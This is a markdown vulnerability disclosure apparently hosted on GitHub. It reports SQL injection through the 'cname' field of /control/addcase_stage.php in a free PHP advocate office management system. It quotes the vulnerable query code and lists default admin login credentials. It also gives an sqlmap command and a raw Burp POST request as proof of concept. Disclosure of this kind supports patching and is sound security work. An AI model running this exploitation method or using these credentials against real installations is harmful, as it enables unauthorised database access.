Skip to content

Latest commit

 

History

History
90 lines (67 loc) · 2.19 KB

kortex-addcase_stage-sqli.md

File metadata and controls

90 lines (67 loc) · 2.19 KB

Kortex Lite Advocate Office Manage System

SQL Injection on /control/addcase_stage.php

Vendor Homepage:

https://www.sourcecodester.com/php/17280/advocate-office-management-system-free-download.html

Version:

v1.0

Tested on:

PHP, Apache, MySQL

Credentials:

http://127.0.0.1/kortex_lite/control/login.php
mayuri.infospace@gmail.com
admin

Affected Page:

/control/addcase_stage.php

In this scenario, the value of user input (the id parameter) is directly concatenated into an SQL query without undergoing any form of filtering or utilizing prepared statements, causing the application vulnerable to SQL injection attack

38:    if(isset($_POST['add'])){    
39:    $cname = $_POST['cname'];

47:    $sql = "INSERT INTO case_stage(name,status) VALUES ('$cname','1')";

Proof of Concept:

Payload:

sqlmap -r request.txt --current-user --batch --dbms mysql

Burp Request:

POST /kortex_lite/control/addcase_stage.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 227
Cache-Control: max-age=0
sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH69K8ihjhi62Hye9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/kortex_lite/control/addcase_stage.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ihtlup31vclhigou4q6if7fl1u
Connection: close

------WebKitFormBoundaryH69K8ihjhi62Hye9
Content-Disposition: form-data; name="cname"

1
------WebKitFormBoundaryH69K8ihjhi62Hye9
Content-Disposition: form-data; name="add"

------WebKitFormBoundaryH69K8ihjhi62Hye9--

Screenshot

image